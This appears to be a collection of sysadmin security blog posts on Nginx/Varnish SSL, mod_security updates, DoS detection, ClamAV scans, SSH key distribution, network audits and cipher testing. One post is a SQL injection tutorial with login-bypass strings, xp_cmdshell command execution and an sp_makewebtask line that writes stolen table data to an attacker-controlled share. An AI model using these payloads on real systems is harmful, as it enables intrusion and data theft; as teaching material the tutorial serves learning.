Force SSL for your site with Varnish and Nginx

Hello!

For those of you who depend on Varnish for robust caching and scaling potential in your web stack, hearing about Google’s prioritization (albeit arguably small, for now) of sites that force SSL may give you pause about how to implement it.

Varnish currently cannot terminate SSL or encrypt requests itself. It may never gain this ability, because its focus is caching content (and it does a very good job of that, I might add).

So if Varnish can’t handle the SSL traffic directly, how would you go about implementing this with Nginx?

Well, nginx has the ability to proxy traffic. This is one of the many reasons why some admins choose to pair Varnish with Nginx. Nginx can do reverse proxying and header manipulation out of the box, without custom modules or configuration. Combine that with the lightweight, production-tested scalability of Nginx over Apache and the reasons are simple. We’re not interested in that debate here, just a simple implementation.

Nginx Configuration

With Nginx, you will need to add an SSL listener to handle the SSL traffic. You then assign your certificate. The actual traffic is then proxied to the (already set up) non-HTTPS listener (Varnish).
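
A minimal sketch of what that listener might look like (the server name and certificate paths are placeholders, and Varnish is assumed to be listening on port 80 on the same host):

    server {
        listen 443 ssl;
        server_name example.com;

        ssl_certificate     /etc/nginx/ssl/example.com.crt;
        ssl_certificate_key /etc/nginx/ssl/example.com.key;

        location / {
            # Hand the decrypted request off to Varnish on port 80
            proxy_pass http://127.0.0.1:80;
            proxy_set_header Host $host;
            proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
            # Tell the backend that this request arrived over SSL
            proxy_set_header X-Forwarded-Proto https;
        }
    }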

The one thing to note before going further is the proxy_set_header X-Forwarded-Proto line near the end of the configuration. It is important because it lets you avoid an infinite redirect loop: the request is proxied to Varnish, Varnish redirects the non-SSL request to SSL, and it lands right back at Nginx to be proxied again. You’ll notice that loop pretty quickly, because your site will ultimately go down 🙁

What nginx is doing is defining a custom HTTP header and assigning a value of “https” to it :
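
    proxy_set_header X-Forwarded-Proto https;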

So the rest of the nginx configuration can remain the same (that is, the configuration to which Varnish ultimately forwards requests in order to cache the content).

Varnish

What you’re going to need in your varnish configuration is a minor adjustment :
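
A minimal sketch of that adjustment in vcl_recv (Varnish 3.x syntax assumed; swap in your own hostname):

    sub vcl_recv {
        # Redirect to SSL unless the request already came through the nginx SSL proxy
        if (req.http.X-Forwarded-Proto !~ "(?i)https") {
            set req.http.x-Redir-Url = "https://www.example.com" + req.url;
            error 750 req.http.x-Redir-Url;
        }
    }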

What the above snippet does is simply check whether the header “X-Forwarded-Proto” (which nginx just set) exists and whether its value equals “https” (case insensitive). If the header is not present or does not match, it sets a redirect to force the SSL connection, which is handled by the nginx SSL proxy configuration above. It’s also important to note that we are not doing a clean-break redirect; we still append the originating request URI in order to make the transition smooth and avoid breaking any previously ranked links/URLs.

The last thing to note is the error 750 handler that handles the redirect in varnish :
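
A sketch of that handler:

    sub vcl_error {
        if (obj.status == 750) {
            set obj.http.Location = obj.response;
            # 302 (temporary) while testing; switch to 301 once everything checks out
            set obj.status = 302;
            return(deliver);
        }
    }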

You can see that we’re using a 302 temporary redirect instead of a permanent 301 redirect. This is your decision, though browsers tend to be stubborn about their own internal caching of 301 redirects, so 302 is good for testing.

After restarting varnish and nginx, you should be able to quickly confirm that non-SSL traffic is no longer allowed. Not only can you enjoy the (marginal) SEO “bump”, you are also contributing to the HTTPS Everywhere movement, which is an important cause!

Auto updating Atomicorp Mod Security Rules

Hello!

If any of you use mod_security as a web application firewall, you might have enlisted the services of Atomicorp for regularly updating your mod_security ruleset with signatures to protect against constantly changing threats to web applications in general.

One of the initial challenges, in a managed hosting environment, was to implement a system that utilizes the Atomicorp mod_security rules and update them regularly on an automated schedule.

When you subscribe to their service, they provide access credentials in order to pull the rules. You then need to integrate the rule files into your mod_security implementation and gracefully restart apache or nginx to ensure all the updated rules are loaded.

We developed a very simple python script, intended to run as a scheduled cron task, to accomplish this. We thought we would share it here in case anyone else finds it useful for accomplishing the same thing. The script could easily be modified to download rules from any similar service. It was written for nginx, but can be changed to integrate with apache.

You’ll find a sketch of the code below (the download URL, credentials and paths are placeholders to adjust for your own subscription and layout). Enjoy!
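
    #!/usr/bin/env python
    """Fetch the latest Atomicorp mod_security rules and reload nginx.

    Sketch only: the URL, credentials and paths below are placeholders.
    """
    import os
    import subprocess
    import tarfile
    import urllib.request

    RULES_URL = "https://updates.example.com/modsec/modsec-latest.tar.gz"  # placeholder
    USERNAME = "your-username"   # credentials provided with your subscription
    PASSWORD = "your-password"
    RULES_DIR = "/etc/nginx/modsec/rules"
    ARCHIVE = "/tmp/modsec-latest.tar.gz"

    def download_rules():
        # Basic-auth download of the rule archive
        mgr = urllib.request.HTTPPasswordMgrWithDefaultRealm()
        mgr.add_password(None, RULES_URL, USERNAME, PASSWORD)
        opener = urllib.request.build_opener(urllib.request.HTTPBasicAuthHandler(mgr))
        with opener.open(RULES_URL) as resp, open(ARCHIVE, "wb") as out:
            out.write(resp.read())

    def install_rules():
        # Unpack the archive over the existing rule directory
        with tarfile.open(ARCHIVE) as tar:
            tar.extractall(RULES_DIR)

    def reload_nginx():
        # Only reload if the configuration still parses cleanly
        if subprocess.call(["nginx", "-t"]) == 0:
            subprocess.call(["nginx", "-s", "reload"])

    if __name__ == "__main__":
        download_rules()
        install_rules()
        reload_nginx()
        os.remove(ARCHIVE)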

How to detect and mitigate DoS (Denial of Service) Attacks

Greetings,

Occasionally, even a very busy site behind a hefty web stack does not have enough capacity to absorb a significant surge of artificial (DoS) requests. Detecting and mitigating denial of service attacks is an important and time-sensitive exercise that will determine the next steps you may need to take to reduce or null route the offending traffic.

These steps are very basic and use the everyday system utilities and tools that are found in vanilla linux implementations. The idea is to utilize these tools to identify connection and request patterns.

I’m going to assume that your potential or assumed attack is going straight to port 80 (HTTP), which would be a common assumption. A typical DoS attack would just be a generation of thousands of requests to a particular page, or perhaps just to the homepage.

Check your Process and Connection Counts

It is a good idea to get a picture of how overworked your system currently is, beyond the initial reports of slow site performance or MySQL errors such as “The MySQL server has gone away”.

Count how many apache/httpd processes you currently have to get an idea :
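
    # count running apache processes (process name may be httpd or apache2 depending on distro)
    ps aux | grep "[h]ttpd" | wc -l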

Check what the CPU load is currently on the server :
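
    # current load averages
    uptime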

On the server we were investigating, the load was quite high and 96 apache processes had spawned. Looks to be quite a busy server! You should take it a step further and identify how many open port 80 (HTTP) connections you have :
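
    # count established connections to port 80
    netstat -an | grep ':80 ' | grep ESTABLISHED | wc -l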

So that’s quite a significant number of HTTP connections on this server. It could be a substantial DoS attack, especially when you consider that this may be one server in a three-server load-balanced pool. That means the numbers here are likely multiplied by three.

Still, it could be legitimate traffic! The spike could be attributed to a link on reddit, or perhaps the site was mentioned on a popular news site. We need to look further at what requests are coming in to be able to determine if perhaps the traffic is organic or artificial. Artificial traffic would typically have thousands and thousands of identical requests, possibly coming from a series of IP addresses.

How distributed a DoS attack is probably depends on the skill and resources of the offending party. If it is a straightforward DoS, hopefully it will be easily identifiable.

Let’s take a closer look at the open connections. Maybe we can see how many connections from individual IP addresses are currently open on the server. That may help identify whether the majority of the traffic is coming from a single source or a small set of sources. Keep this information aside once the analysis is complete so it can be used to report and block the traffic and ultimately mitigate the attack.
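
Something along these lines will do it :

    netstat -an | grep ':80 ' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -rn | awk '$1 >= 45'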

What the above line essentially does is scan the open connections specifically to port 80 and filters only the IP addresses that have 45 or more open connections. This number can obviously be adjusted to whatever you like. Take a look at the different results and see what it produces.

For potentially offending IP addresses, whois them and see where they originate from. Are they from a country that typically isn’t interested in your site? If the site is an English-language site about local school programs in a small North American city, chances are someone from China or Russia has little legitimate interest in it.

Analyze the Requests

In this scenario, we would be analyzing the apache access logs in order to get a clearer picture of what exactly is happening that is generating the DoS. Access logs in apache are a great resource to get the source IP, request URI and other useful information that may help identify an automated tool such as LOIC or an automated botnet perhaps that is sending thousands of identical requests to your server.

Let’s filter out the actual GET requests from the apache logs, sort them, and count each request in order to show the highest number of requests for the same URI. If we can take this information and cross-reference it with the connection stats we gathered earlier, we should have a clear picture of who is conducting the attack and how they are doing it.
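
Something like the following (adjust the access log path for your own setup) :

    grep 'GET' /var/log/httpd/access_log | awk '{print $7}' | sort | uniq -c | sort -rn | awk '$1 >= 45'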

This code filters GET requests from the logs, cleans them up, sorts the results, counts all the duplicate requests, sorts them by highest number of requests, and prints the results.

Again, the 45 in the last portion of the command can be changed to whatever you feel is necessary. It all depends on what a normal request looks like, what legitimate traffic looks like, and how busy your server normally is.

All the data you have gathered thus far should be enough to complete a preliminary investigation into your DoS attack. As for mitigation, there are many options. I won’t go too deeply into it because that could be considered a completely separate topic. I’ll give some suggestions for you either way :

Block offending IPs with IPTABLES :
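
    # replace 192.0.2.1 with the offending address
    iptables -A INPUT -s 192.0.2.1 -j DROP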

Use software layer mitigation such as mod_evasive or mod_security to reduce the ability of attackers to generate significant numbers of requests. Most importantly of all, use your best judgement!

Security Penetration Testing Series : SQL Injection

I am starting a series of blog posts that detail security related strategies, penetration testing and best practice methodologies. To start our series, I am going to delve into the world of SQL injection techniques and a general overview for those who are looking to learn a little more about this method of injection.

There is already quite a bit of documentation out there regarding this, so I hope this post isn’t too redundant. There are a lot of tools out there to assist in accomplishing this task, or at the very least tools that assist in automating the probing and injection of SQL from publicly facing websites, forms and the like.

One such tool is SQLMAP (http://sqlmap.sourceforge.net/). SQLMAP is an “open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of back-end database servers.”

This article does not introduce anything new; SQL injection has been widely written about and used in the wild. I thought I’d write this article to document some of the SQL injection methods in the hope that it may be of use to some of you out there in cyberspace.

What is SQL injection anyway?

It is a trick to inject an SQL query or command as input, typically via web pages. Many web pages take parameters from the user and build an SQL query against the database. Take a login page, for instance: the page takes a user name and password and issues an SQL query to the database to check whether the credentials are valid. With SQL injection, it is possible to send a crafted user name and/or password that changes the SQL query and thus grants us something else.

What do you need?

Technically all you need is a web browser.

What should I look for?

Web forms. Any input area of a website that interacts with its database backend. This could be a login form, a search form, or anything like that.

You could also look for pages that actually have querystrings in the URL such as :
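
    http://www.example.com/index.asp?id=10        (hypothetical URL)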

Testing if it’s vulnerable

With those query string URLs or web forms, you can do a simple test to see if it’s vulnerable to injection. Start with the “single quote trick”, something like this :
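
    hi' or 1=1--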

For example :
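
    Login:    hi' or 1=1--
    Password: hi' or 1=1--
    http://www.example.com/index.asp?id=hi' or 1=1--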

If you do that in a login form, for example, and it works, then you will be logged in without needing a valid password.

Why ' or 1=1--?

Let us look at another example of why ' or 1=1-- is important. Beyond bypassing the login, it is also possible to view extra information that is not normally available. Take an ASP page that links you to another page with the following URL:
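
    http://www.example.com/shop.asp?category=food        (hypothetical URL)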

In the URL, ‘category’ is the variable name and ‘food’ is the value assigned to it. To handle that, the ASP page might contain code along these lines (a representative sketch of the kind of code we wrote for this exercise):
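
    v_cat = request("category")
    sqlstr = "SELECT * FROM product WHERE PCategory='" & v_cat & "'"
    set rs = conn.execute(sqlstr)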

As we can see, our variable will be wrapped into v_cat and thus the SQL statement should become:
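
    SELECT * FROM product WHERE PCategory='food'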

The query should return a resultset containing one or more rows that match the WHERE condition, in this case, ‘food’.

Now, assume that we change the URL into something like this:
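
    http://www.example.com/shop.asp?category=food' or 1=1--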

Now our variable v_cat equals "food' or 1=1-- "; if we substitute this into the SQL query, we will have:
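
    SELECT * FROM product WHERE PCategory='food' or 1=1--'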

The query should now select everything from the product table regardless of whether PCategory is equal to ‘food’ or not. A double dash "--" tells MS SQL Server to ignore the rest of the query, which gets rid of the last hanging single quote ('). Sometimes it may be possible to replace the double dash with a single hash "#".

However, if it is not MS SQL Server, or you simply cannot ignore the rest of the query, you may also try
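
    ' or 'a'='a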

The SQL query will now become:
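
    SELECT * FROM product WHERE PCategory='food' or 'a'='a'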

It should return the same result.

Depending on the actual SQL query, you may have to try some of these possibilities:
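
    ' or 1=1--
    " or 1=1--
    or 1=1--
    ' or 'a'='a
    " or "a"="a
    ') or ('a'='a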

Remote execution with SQL injection

Being able to inject SQL commands usually means we can execute any SQL query at will. A default installation of MS SQL Server runs as SYSTEM, which is equivalent to Administrator access in Windows. We can use stored procedures like master..xp_cmdshell to perform remote execution:
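
    '; exec master..xp_cmdshell 'ping 10.10.1.2'--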

Try using double quote (“) if single quote (‘) is not working.

The semicolon ends the current SQL statement and allows you to start a new SQL command. To verify that the command executed successfully, you can listen for ICMP packets from 10.10.1.2 and check whether any packets arrive from the server:
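
    # run this on 10.10.1.2 (the host you told the server to ping)
    tcpdump icmp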

If you do not get any ping requests from the server, and you get an error message indicating a permission problem, it is possible that the administrator has limited the web user’s access to these stored procedures.

Getting the output of my SQL query

It is possible to use sp_makewebtask to write your query output into an HTML file:
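
    -- writes the query output to an HTML file on a share you control
    -- (10.10.1.3 is a hypothetical attacker-controlled host)
    '; EXEC master..sp_makewebtask "\\10.10.1.3\share\output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"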

But the target IP must have a folder named “share” shared for Everyone.

Hope this helps!

Integrate your custom IPTables script with Linux

How do I integrate my custom iptables script with Red Hat Enterprise Linux?

A custom iptables script is sometimes necessary to work around the limitations of the Red Hat Enterprise Linux firewall configuration tool. The procedure is as follows (a sketch of the commands for each step appears after the list):

1. Make sure that the default iptables initialization script is not running:

2. Execute the custom iptables script:

3. Save the newly created iptables rules:

4. Restart the iptables service:

5. Verify that the custom iptables ruleset has taken effect:

6. Enable automatic start up of the iptables service on boot up:
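
Taken together, the steps above map to commands along these lines (RHEL-style service and chkconfig commands assumed; the custom script path is a placeholder):

    # 1. Stop the default iptables initialization script
    service iptables stop

    # 2. Execute the custom iptables script (placeholder path)
    /root/custom-iptables.sh

    # 3. Save the newly created rules
    service iptables save

    # 4. Restart the iptables service
    service iptables restart

    # 5. Verify that the custom ruleset has taken effect
    iptables -L -n

    # 6. Enable automatic start up on boot
    chkconfig iptables on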

The custom iptables script should now be integrated into the operating system.

Scheduled antivirus scans to prevent viral injections on user generated content

When dealing with high-traffic sites, especially media or community based sites, there is always the risk of javascript, virus, XSS or other malicious injection when you give a community of users the ability to upload files to your site.

There are several things to consider when evaluating all “points of entry” that are available to the public, into your systems.

Most content management and community based systems use libraries such as Imagemagick to process images (such as profile pictures) into their proper format and size.

Believe it or not, it is actually hard to inject code or other malicious data into the image itself in a way that survives this sanitizing process. There are still risks, however: the library version you are running may itself be vulnerable to exploits.

As always, a good rule of thumb is to ensure all possible aspects of your systems are up to date and that you are aware of any security vulnerabilities as they come out so they can either be patched or addressed in some other way.

One thing to consider, especially when dealing with thousands of users and even more uploads, is a scheduled scan of your user uploads using free virus scanning tools such as clamscan. This is an endpoint reporting strategy that can at least cover your ass in the event that something else was missed or a 0-day vulnerability was exploited.

It should be noted that the virus scans themselves aren’t intended to protect the linux systems themselves, but rather the opportunistic ‘spreading’ of compromised images and code that having an infected file on a public community based system can provide.

It’s very simple to implement ClamAV (daemonization is not necessary); clamscan is all we need to execute regular scans at 10, 15, 30 or 60 minute intervals.

Once clamscan is implemented and definitions are updated (with regular update cronjobs in place), you can roll out a script along the lines of the one sketched below to implement the scheduled scans :
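
    #!/bin/bash
    # Scheduled clamscan of the user upload directory; report-only.
    # Paths and the notification address are placeholders - adjust for your site.

    UPLOAD_DIR="/var/www/html/uploads"
    LOGFILE="/var/log/clamav/upload-scan-$(date +%Y%m%d%H%M).log"
    MAILTO="security@example.com"

    # Scan recursively, logging only infected files (no deletion).
    clamscan -r -i "$UPLOAD_DIR" > "$LOGFILE" 2>&1

    # clamscan exits 1 when a virus is found; mail the log if so.
    if [ $? -eq 1 ]; then
        mail -s "clamscan: possible infection found in $UPLOAD_DIR" "$MAILTO" < "$LOGFILE"
    fi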

The actual cronjob entry can look something like this :
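
    # /etc/crontab entry - run the upload scan every 30 minutes (script path is a placeholder)
    */30 * * * * root /usr/local/bin/scan_uploads.sh > /dev/null 2>&1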

It seems like a rather simple solution, but it does provide a venue for additional sanitizing of user input. In our experience, it is best to only report on anything that clamscan might find. You can, however, tell clamscan to simply delete any suspected infections it finds.

Script to distribute SSH Keys across many servers

Hello once again!

You may remember an earlier post that detailed how to implement SSH Key based authentication.

We believe it is important, when administering many (sometimes hundreds or thousands) of servers, to implement a strategy that can allow systems administrators to seamlessly run scripts, system checks or critical maintenance across all the servers.

SSH Key authentication allows for this potential. It is a very powerful strategy and should be maintained and implemented with security and efficiency as a top priority.

Distributing keys for all authorized systems administrators makes maintaining this authentication system much easier: when an admin leaves or is dismissed, you need to be able to remove his or her keys from the “pool” quickly.

The idea behind this script is to have a centralized, highly secure and restricted key repository server. Each server in your environment would run this script to “pull” the updated key list from the central server. The script would run as a cron job and can run as often as you like. Ideally every 5-10 minutes would allow for quick key updates / distribution.

Here is a sketch of the perl script (the central key server URL and destination path are placeholders to adjust for your environment) :
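
    #!/usr/bin/perl
    # Pull the current authorized_keys list from a central key server
    # and install it for the admin account. URL and paths are placeholders.
    use strict;
    use warnings;

    my $key_url   = 'http://keys.example.com/authorized_keys';
    my $tmp_file  = '/tmp/authorized_keys.new';
    my $dest_file = '/home/admin/.ssh/authorized_keys';

    # Fetch the published key list with wget
    system('wget', '-q', '-O', $tmp_file, $key_url) == 0
        or die "wget failed: $?";

    # Only replace the existing file if we actually got something back
    if (-s $tmp_file) {
        system('cp', $tmp_file, $dest_file) == 0 or die "copy failed: $?";
        chmod 0600, $dest_file;
        unlink $tmp_file;
    }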

Note that it downloads the public keys via HTTP with wget. This can easily be modified to use HTTPS if necessary, or even another protocol to make the transfer. HTTP was chosen because the public keys are harmless and HTTP is the easiest method. HTTPS would be desirable, however.

We hope this script helps you along the way towards making your life easier! 😉

Shell Script to Report On Hacking Attempts

It is always a good idea, when implementing open source firewalls (iptables, pf, etc.), to build in as much reporting and verbosity as possible.

Having verbose reports on the state of your firewall, intrusion attempts and other information is key to ensuring the health and integrity of your network.

Somewhere along the line, we wrote a script to provide daily reports on intrusion attempts to penetrate our network — this usually happens when someone exceeds certain connection thresholds.

It may not be the most informative data, but the script can be modified to provide other important statistical information. It can also be modified to be used with other firewall implementations. I’m certain it wouldn’t be hard to convert this script to utilise iptables.

Below you will find a sketch of the script; it can be set to run daily as a cronjob. Also note that the script tries to resolve a hostname for each IP address to at least provide some quick & easy information to the security administrators when determining coordinated attacks or attacks coming from compromised systems.
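
This sketch assumes pf with an overload table named "bruteforce" (hosts that exceed connection thresholds get added to it) and a placeholder recipient address:

    #!/bin/bash
    # Daily report of IPs that tripped the firewall's connection thresholds.
    # Assumes pf with an overload table named "bruteforce"; adjust to taste.

    MAILTO="security@example.com"
    REPORT="/tmp/intrusion-report-$(date +%Y%m%d).txt"

    echo "Hosts blocked by pf as of $(date):" > "$REPORT"
    echo "" >> "$REPORT"

    # List the blocked addresses and try to resolve a hostname for each
    for ip in $(pfctl -t bruteforce -T show 2>/dev/null); do
        name=$(host "$ip" 2>/dev/null | awk '/pointer/ {print $NF}')
        echo "$ip ${name:-unresolved}" >> "$REPORT"
    done

    mail -s "Daily firewall intrusion report" "$MAILTO" < "$REPORT"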

Enjoy!

Network Audit Bash Script Using Netbios and Nmap

Working in a large office, it is sometimes necessary to use different network audit tools in order to properly assess the integrity and security of networks.

In order to quickly audit a network , I created this script to scan selected IPs, read from a configuration file, and compile a simple report to be emailed. The script can be modified to suit your needs, such as exporting the data to a database or perhaps an HTML report for a web based reporting site.

The script itself doesn’t do anything particularly special, however it has proven useful when you want to do a quick & dirty network audit.

There are other tools out there, such as OpenAudit, Nessus and Nmap, that could do similar tasks. However, the important thing to remember here is that those tools (with the exception of OpenAudit perhaps) can be incorporated into this script to perform regular scheduled audits.

This script could actually be updated to use nmap v5.0; taking advantage of the new features plus ndiff could turn it into a very powerful network analysis tool.

Hopefully some of you will find some use out of the script! Enjoy!
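
A simplified sketch of the script (nbtscan handles the NetBIOS piece, nmap the port scan; file names and the mail recipient are placeholders):

    #!/bin/bash
    # Quick-and-dirty network audit: NetBIOS names plus an nmap service scan
    # for every IP listed in the config file. File names and the mail
    # recipient are placeholders.

    IP_LIST="all_windows_linux_ips.txt"
    REPORT="/tmp/network-audit-$(date +%Y%m%d).txt"
    MAILTO="netadmin@example.com"

    echo "Network audit report - $(date)" > "$REPORT"

    while read -r ip; do
        [ -z "$ip" ] && continue
        echo "===== $ip =====" >> "$REPORT"
        # NetBIOS name / workgroup information (Windows hosts)
        nbtscan -q "$ip" >> "$REPORT" 2>&1
        # Open ports and service versions
        nmap -sV -T4 "$ip" >> "$REPORT" 2>&1
    done < "$IP_LIST"

    mail -s "Scheduled network audit" "$MAILTO" < "$REPORT"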

Note that “all_windows_linux_ips.txt” is just a text file with the IP addresses of the hosts on your network. It can be modified to simply use whole subnets to make the audit easier to perform.

Testing for weak SSL ciphers for security audits

During security audits, such as a PCI-DSS compliance audit, it is very commonplace to test the cipher mechanism that a website / server uses and supports to ensure that weak / outdated cipher methods are not used.

Weak ciphers allow for an increased risk in encryption compromise, man-in-the-middle attacks and other related attack vectors.

Due to historic export restrictions on high-grade cryptography, both legacy and new web servers are often able to handle, and configured to accept, weak cryptographic options.

Even if high grade ciphers are normally used and installed, some server misconfiguration could be used to force the use of a weaker cipher to gain access to the supposed secure communication channel.

Testing SSL / TLS cipher specifications and requirements for site

The http clear-text protocol is normally secured via an SSL or TLS tunnel, resulting in https traffic. In addition to providing encryption of data in transit, https allows the identification of servers (and, optionally, of clients) by means of digital certificates.

Historically, there have been limitations set in place by the U.S. government to allow cryptosystems to be exported only for key sizes of, at most, 40 bits, a key length which could be broken and would allow the decryption of communications. Since then, cryptographic export regulations have been relaxed (though some constraints still hold); however, it is important to check the SSL configuration being used to avoid putting in place cryptographic support which could be easily defeated. SSL-based services should not offer the possibility to choose weak ciphers.

Testing for weak ciphers : examples

In order to detect possible support of weak ciphers, the ports associated with SSL/TLS-wrapped services must be identified. These typically include port 443, which is the standard https port; however, this may change because a) https services may be configured to run on non-standard ports, and b) there may be additional SSL/TLS-wrapped services related to the web application. In general, a service discovery is required to identify such ports.

The nmap scanner, via the “-sV” scan option, is able to identify SSL services. Vulnerability Scanners, in addition to performing service discovery, may include checks against weak ciphers (for example, the Nessus scanner has the capability of checking SSL services on arbitrary ports, and will report weak ciphers).

Example 1. SSL service recognition via nmap.
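
    # identify SSL-wrapped services on a (hypothetical) target host
    nmap -sV --reason -PN -n -p 443 www.example.com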

Example 2. Identifying weak ciphers with Nessus. The following is an anonymized excerpt of a report generated by the Nessus scanner, corresponding to the identification of a server certificate allowing weak ciphers

Example 3. Manually audit weak SSL cipher levels with OpenSSL. The following will attempt to connect to Google.com with SSLv2.
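
    # requires an OpenSSL build that still includes SSLv2 support
    openssl s_client -connect www.google.com:443 -ssl2

If the handshake completes, the server still accepts SSLv2 and its cipher configuration should be considered weak.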

These tests usually provide a very in-depth and reliable method for ensuring weak and vulnerable ciphers are not used in order to comply with said audits.

Personally, I prefer the Nessus audit scans. Usually the default “free” plugins are enough to complete these types of one-off audits. There are, however, commercial Nessus plugins designed specifically for PCI-DSS compliance audits, which are available for purchase from the Nessus site.